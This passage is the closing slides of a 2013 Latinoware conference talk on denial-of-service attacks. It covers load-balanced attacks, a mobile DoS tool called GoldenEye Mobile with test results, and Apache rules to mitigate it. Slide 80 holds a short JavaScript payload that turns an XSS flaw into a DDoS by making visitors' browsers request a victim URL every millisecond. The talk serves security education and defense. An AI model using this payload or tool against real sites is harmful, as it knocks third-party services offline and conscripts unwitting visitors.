    77. 77. Load Balancing Attacks Dangers of 'load-balanced' attacks? ● ● Bypass connection-limiting ● ● ● ● ● ● DoS → DDoS Mutiple origin IPs Origins can be from multiple countries Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    78. 78. Load Balancing Attacks Dangers of 'load-balanced' attacks? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    79. 79. Load Balancing Attacks More about the Jericho Attack Technique http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    80. 80. XSS D/DoS What if an XSS flaw could turn your visitors into D/DoS clients? <script> function DDoS() { a = new Date() unixepoch = a.getTime() } elm = document.createElement("img") victimURL = "http://10.1.1.114/" elm.src = victimURL+"?"+unixepoch setInterval("DDoS()",1); </script> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    81. 81. Mobile-launched Denial-of-Service PoC Tool: GoldenEye Mobile Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    82. 82. Mobile-launched Denial-of-Service Objective Test if mobile devices alone could conduct a successful DoS attack. Test if equipment and configurations are able to deter DoS attacks from mobile platforms. Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    83. 83. Mobile-launched Denial-of-Service Android: Limitations Max 128 threads (Android 2.1) Maximum number of concurrent sockets per thread: 30 (>30 too many open files) Can we get better results if device is 'rooted' (sysctl) ? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    84. 84. Mobile-launched Denial-of-Service Firepower 5 min test on an Apache webserver, default configuration, in a Debian 6 virtual machine, also with default configuration. CPU Usage: u5.85 s4.52 cu0 cs0 ­ 2.37% CPU  load Low CPU fingerprint Server overloaded  (a.k.a. down) https://github.com/jseidl/GoldenEye-Mobile Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    85. 85. Mobile-launched Denial-of-Service GoldenEye Mobile: Mitigation GoldenEye Mobile uses HEAD method for maximum speed. Easily blocked (Module: Mod_Rewrite) RewriteEngine on RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$  RewriteRule .* ­ [F] mod_security SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405" Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    86. 86. Demo: DoS Fun GoldenEye Mobile DoS Android Tool Demo! http://bit.ly/GoldenEyeMDOS Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    87. 87. Questions? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    88. 88. Thanks! – To Peace! Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    89. 89. Thanks! Thanks for your time! jseidl@wroot.org / http://wroot.org https://github.com/jseidl http://www.slideshare.net/jseidl @jseidl Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil

    ×